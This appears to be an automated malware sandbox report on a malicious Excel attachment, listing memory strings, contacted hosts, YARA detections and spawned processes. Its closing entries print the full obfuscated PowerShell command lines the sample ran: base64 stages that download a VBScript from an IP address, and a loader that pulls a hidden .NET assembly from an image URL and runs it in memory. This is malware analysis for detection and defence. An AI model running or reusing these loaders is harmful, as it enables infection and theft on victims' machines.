Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.usertru
Source: powershell.exe, 00000007.00000002.465465325.000000001C4A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.cr
Source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000007.00000002.458485050.0000000002531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.518019597.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000023BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jktc.pro/
Source: mshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jktc.pro/1.a2M
Source: mshta.exe, 00000004.00000003.437054940.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440382828.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jktc.pro/5
Source: mshta.exe, 0000000F.00000002.488436254.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Euro confirmation Sp.xls, ~DF634BD35CC9B94982.TMP.0.dr	String found in binary or memory: https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=gr
Source: mshta.exe, 00000004.00000003.437054940.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440382828.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jktc.pro/:
Source: powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.518019597.00000000024A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 00000018.00000002.549469905.0000000002412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
Source: powershell.exe, 0000000D.00000002.518019597.00000000024A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 104.21.34.183:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.34.183:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.184:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.184:443 -> 192.168.2.22:49169 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2956, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: Euro confirmation Sp.xls	OLE: Microsoft Excel 2007+
Source: Euro confirmation Sp.xls	OLE: Microsoft Excel 2007+
Source: Euro confirmation Sp.xls	OLE: Microsoft Excel 2007+
Source: Euro confirmation Sp.xls	OLE: Microsoft Excel 2007+
Source: ~DF634BD35CC9B94982.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: ~DF634BD35CC9B94982.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: ~DF634BD35CC9B94982.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: ~DF634BD35CC9B94982.TMP.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
